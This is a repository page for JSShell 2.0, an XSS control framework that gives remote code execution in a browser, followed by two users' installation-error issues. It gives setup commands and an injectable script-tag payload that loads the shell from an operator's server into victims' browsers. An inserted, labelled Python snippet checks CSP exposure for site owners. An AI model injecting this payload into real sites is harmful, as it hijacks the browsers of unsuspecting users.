
jsshell's Introduction

JSShell 2.0


An interactive, multi-user, web-based JavaScript shell. It was initially created to debug remote esoteric browsers during experiments and research. This tool can be easily attached to an XSS (Cross-Site Scripting) payload to achieve browser remote code execution (similar to the BeEF framework).

Version 2.0 was written entirely from scratch, introducing new features along with improved stability and maintainability.

Version: 2.0

Author

Daniel Abeles.


Features

  • Multi client support
  • Cyclic DOM objects support
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable via <script> tags
  • Dumping command output to file
  • Shell pagination
  • HTTPS support!

Installation & Setup

Config File

In the resources directory, update the config.json file with your desired configuration:

  • Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
  • Return URL - the URL which the requests will follow. The shell.js file makes AJAX calls to register and poll for new commands. Usually it will be http[s]://{YOUR_SERVER_IP}:{PORT}.
  • Startup script - a script that runs automatically when the JSShell CLI client is spawned.
  • Domain - if you desire to generate TLS certificates, this is the domain name the server will use.
  • It is also possible to point at a remote database if desired.

Let's Encrypt

JSShell now supports TLS, which means you can generate TLS certificates and feed them to the web server. The web server will infer the domain name from the config.json file. To create the certificate, use the create_cert.py script in the scripts folder:

$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>
The email field is optional.

Please note that the web server must be down for the script to function properly. At this point, we have successfully generated our certificates! The only modifications we need to make are:

  • In the config.json file, change the scheme of the URL field to https.
  • In the docker-compose.yml file change the exposed port of the web container to 443.

Docker

This new version supports installing and running JSShell via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:

$ ./scripts/start_docker_shell.sh

This will:

  • Start and create the database in the background
  • Start the web API server that handles incoming connections in the background
  • Spawn a new instance of the JSShell command line interface container

Regular

If you still want to use the old-fashioned installation method, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.

I recommend using a virtual environment with pyenv:

$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

Or using virtualenv:

$ virtualenv -p python3.6 venv
$ source venv/bin/activate

Then, install the requirements:

$ pip install -r requirements.txt

Running

If you used the docker method, there's no need to run the following procedure.

Web Server

Otherwise, once we have the database set up, we need to start the web API server. To do so, run:

$ python manage.py web

This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell

Now to start the JSShell CLI, run the same script but now with the shell flag:

$ python manage.py shell

Usage

After setting up and running the required components, enter the help command to see the available commands:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>> 

Flow

JSShell supports 2 methods of operation:

  1. Injectable Shell (similar to the BeEF framework)
  2. Hosted Shell (for debugging)

Injectable Shell

Similar to other XSS control frameworks (like BeEF), JSShell is capable of managing successful XSS exploitations. For example, if you can inject a script tag, include the following resource in your payload, and a new client will appear in your console:

<script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>
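
Added example (not part of JSShell or its README): a simplified Content-Security-Policy check that a site owner can use to see whether their policy would let a browser load an external script like the one above (script-src) and then make the register/poll AJAX calls to the Return URL (connect-src). The page URL, server address and both policies are constructed samples; the matcher ignores nonces, hashes, script-src-elem, source paths and IPv6 hosts, so it is an approximation of browser behaviour.

```python
from urllib.parse import urlsplit

PORTS = {"http": 80, "https": 443}

def parse_csp(header):
    """Map each directive to its source list; the first occurrence wins."""
    policy = {}
    for tokens in filter(None, (p.lower().split() for p in header.split(";"))):
        policy.setdefault(tokens[0], tokens[1:])
    return policy

def origin(url):
    u = urlsplit(url)
    return u.scheme, u.hostname or "", u.port or PORTS.get(u.scheme)

def source_matches(src, url, page_url):
    scheme, host, port = origin(url)
    if src == "'self'":
        return origin(url) == origin(page_url)
    if src == "*":
        return scheme in PORTS
    if src.startswith("'"):                 # 'none', nonces, hashes, 'unsafe-*'
        return False                        # never admit a URL on their own
    if src.endswith(":"):                   # scheme-source such as https:
        return scheme == src[:-1]
    s_scheme, _, rest = src.rpartition("://")
    s_host, _, s_port = rest.split("/", 1)[0].partition(":")  # path ignored
    want = s_scheme or origin(page_url)[0]  # scheme-less source follows the page
    scheme_ok = scheme == want or (want == "http" and scheme == "https")
    host_ok = host.endswith(s_host[1:]) if s_host.startswith("*.") else host == s_host
    port_ok = s_port == "*" or port == (int(s_port) if s_port else PORTS.get(scheme))
    return scheme_ok and host_ok and port_ok

def allows(header, directive, url, page_url):
    policy = parse_csp(header)
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True                         # nothing governs this fetch
    return any(source_matches(s, url, page_url) for s in sources)

def shell_exposure(header, shell_url, page_url):
    # True means the browser would permit that step for the external host.
    return {d: allows(header, d, shell_url, page_url) for d in ("script-src", "connect-src")}

# Constructed sample values (not from the JSShell project).
PAGE = "https://app.example.com/profile"
SHELL = "https://203.0.113.10:8443/content/js"
WEAK = "default-src 'self'; script-src 'self' https: 'unsafe-inline'"
STRICT = "default-src 'none'; script-src 'self' https://cdn.example.com; connect-src 'self'"
```

With the WEAK policy the bare https: source admits the external script even though connect-src falls back to 'self'; the STRICT policy refuses both steps, and a page with no policy permits both.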

Hosted Shell

If you desire to debug exotic and esoteric browsers, you can simply navigate to http[s]://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits

Canop for JSON.prune

Use it at your own responsibility and risk.


jsshell's Issues

Help me ASAP please

root@kali:/opt/JSShell# python manage.py web
Traceback (most recent call last):
  File "manage.py", line 23, in <module>
    ).get(args.mode)()
  File "manage.py", line 8, in handle_web
    from web import start_api_server
  File "/opt/JSShell/web/__init__.py", line 24
def start_api_server() -> None:

Cannot install from Docker or regular way

Running ./scripts/start_docker_shell.sh fails:

running JSShell 2.0 CLI ...
db not exists, creating it...
jsshell-master_db_1 is up-to-date
web API not exists, creating it...
Building web
Step 1/9 : FROM python:3.6-jessie
 ---> 890456b21ed5
Step 2/9 : RUN apt-get update
 ---> Using cache
 ---> 266133288743
Step 3/9 : RUN apt-get install software-properties-common less vim -y
 ---> Using cache
 ---> 2d8c3877cd63
Step 4/9 : ENV INSTALL_PATH /app/
 ---> Using cache
 ---> e288e0d6ca01
Step 5/9 : RUN mkdir -p $INSTALL_PATH
 ---> Using cache
 ---> 612d2c5e43bc
Step 6/9 : WORKDIR $INSTALL_PATH
 ---> Using cache
 ---> 2d3a57cbf551
Step 7/9 : COPY requirements.txt requirements.txt
 ---> Using cache
 ---> 7cec26c3660a
Step 8/9 : RUN pip install -r requirements.txt
 ---> Using cache
 ---> 433715145f67
Step 9/9 : COPY . .
 ---> Using cache
 ---> 5d2006eaa508
Successfully built 5d2006eaa508
Successfully tagged jsshell-master_web:latest
jsshell-master_db_1 is up-to-date
Starting jsshell-master_web_1 ... error

ERROR: for jsshell-master_web_1  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'

ERROR: for web  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'
ERROR: Encountered errors while bringing up the project.
Starting jsshell-master_db_1 ... done
Starting jsshell-master_web_1 ... error

ERROR: for jsshell-master_web_1  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'

ERROR: for web  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'
ERROR: Encountered errors while bringing up the project.

Running python manage.py web fails too:


 * Serving Flask app "web" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "manage.py", line 23, in <module>
    ).get(args.mode)()
  File "manage.py", line 9, in handle_web
    start_api_server()
  File "/Users/kaatt/Downloads/JSShell-master/web/__init__.py", line 36, in start_api_server
    lets_encrypt_base_path + 'privkey.pem'
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/flask/app.py", line 943, in run
    run_simple(host, port, self, **options)
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 1009, in run_simple
    inner()
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 962, in inner
    fd=fd,
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 805, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 723, in __init__
    self.socket = ssl_context.wrap_socket(sock, server_side=True)
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 611, in wrap_socket
    **kwargs
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/ssl.py", line 1232, in wrap_socket
    context.load_cert_chain(certfile, keyfile)
FileNotFoundError: [Errno 2] No such file or directory

Really want to use this. Can you help troubleshoot what's the issue here?
